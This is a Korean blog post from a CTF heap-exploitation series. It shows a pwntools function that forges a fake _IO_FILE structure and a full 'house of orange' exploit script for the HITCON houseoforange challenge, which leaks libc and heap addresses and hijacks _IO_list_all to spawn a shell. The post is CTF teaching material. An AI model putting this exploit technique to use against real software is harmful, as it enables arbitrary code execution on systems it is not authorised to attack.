2019/09/06 - [힙(heap)/house_of_orange] - house_of_orange (4) HITCON house of orange writeup
이렇게 저번에는 hitcon 문제를 통해 실제 익스코드를 짜보았습니다. 하지만 일일이 가짜 _IO_FILE 구조체를 짜는 것은 번거로우므로 이제는 자동으로 가짜 구조체를 만들어주는 모듈을 만들어보겠습니다.
만드는 법은 간단합니다. 우리가 2번째 글에서 배운 것처럼 조건을 통과하도록 구조체를 작성해주시고 return 해주시면 됩니다.
2019/09/03 - [힙(heap)/house_of_orange] - house_of_orange (2)
from pwn import *
def hog(IO_list, ptr, fun):
payload = '/bin/sh\x00'
payload += p64(0x61) # size
payload += p64(0)
payload += p64(IO_list - 16) # bk
payload += p64(2) #_IO_write_base
payload += p64(3) # _IO_write_ptr
payload += p64(fun) # one_gadget or system
payload = payload.ljust(0xc0, '\x00')
payload += p64(0) # _mode
payload = payload.ljust(0xd8,'\x00')
payload += p64(ptr+24) # vtable
return payload
사용방법은 이 함수를 사용할 파일과 같은 경로에 저 파일을 두고
import hog함수가 든 파일명(.py를 안붙여야함)이런식이나
from hog함수가 든 파일명(.py를 안붙여야함) import hog 이런식으로 사용하시면 됩니다.
그래서 이것을 사용하게 되면
2019/09/06 - [힙(heap)/house_of_orange] - house_of_orange (4) HITCON house of orange writeup
여기서의 익스코드가
from pwn import *
from hog import hog
context.log_level="debug"
def build_house(length,name,price,color):
p.sendlineafter('Your choice : ', '1')
p.sendlineafter('Length of name :',str(length))
p.sendafter('Name :', str(name))
p.sendlineafter('Price of Orange:', str(price))
p.sendlineafter('Color of Orange:', str(color))
def see_the_house():
p.sendlineafter('Your choice : ', '2')
def upgrade_house(length,name,price,color):
p.sendlineafter('Your choice : ', '3')
p.sendlineafter('Length of name :',str(length))
p.sendafter('Name:', str(name))
p.sendlineafter('Price of Orange:', str(price))
p.sendlineafter('Color of Orange:', str(color))
p = process('./houseoforange')
e = ELF("./houseoforange")
l = e.libc
pause()
build_house(400,10,10,1)
####free old top chunk
payload = 'a' * 0x190
payload += p64(0) ## next chunk : prev_size
payload += p64(33) ## next chunk : size
payload += p64(0x1f0000000a) ##next chunk : content
payload += p64(0) ##next chunk : content
payload += p64(0) ## top chunk : prev_size
payload += p64(0xe21) ## top chunk : size
upgrade_house(4000,payload,10,1)
build_house(0x1000,10,10,1) ## call malloc : request > top chunk_size
#####################
###LEAK libc using main_arena + 88
build_house(1100,'LEAK_ADD',10,1)
see_the_house()
libc = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 1624 - 16
libc -= l.sym['__malloc_hook']
log.info('libc : ' + hex(libc))
log.info('sys : ' + hex(libc + l.sym['system']))
###########################
###LEAK heap_addr
upgrade_house(1000,'a' * 16, 10, 1)
see_the_house()
p.recvuntil('a' * 16)
old_top_addr = u64(p.recv(6).ljust(8,'\x00'))
log.info('old_top_addr : ' + hex(old_top_addr))
################
###unsorted bin attack && write fake _IO_FILE
start = old_top_addr + 0x450 + 8 * 6
log.info('fake struct start : ' + hex(start))
payload = 'a' * 0x450
payload += p64(0) ## next chunk : prev_size
payload += p64(33) ## next chunk : size
payload += p64(0x1f0000000a) ##next chunk : content
payload += p64(0) ##next chunk : content
payload += hog(libc+ l.sym['_IO_list_all'], start, libc + l.sym['system'])
upgrade_house(0x1000,payload,10,1)
#####################
pause()
p.sendlineafter('Your choice : ', '1') ## triger malloc()
p.interactive()
d이런식으로 코드가 한결 더 간결해지게 됩니다.
'힙(heap) > house_of_orange' 카테고리의 다른 글
| house_of_orange - _wide_data 이용해서 익스플로잇(자동 구조체) (0) | 2019.09.12 |
|---|---|
| house_of_orange (6) pwnable.tw - bookwriter (0) | 2019.09.10 |
| house_of_orange (4) HITCON house of orange writeup (0) | 2019.09.06 |
| house_of_orange (3) (0) | 2019.09.04 |
| house_of_orange (2) (0) | 2019.09.03 |